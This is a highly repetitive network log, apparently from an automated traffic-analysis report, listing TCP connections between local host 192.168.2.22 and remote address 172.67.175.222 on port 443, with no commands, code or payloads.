Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
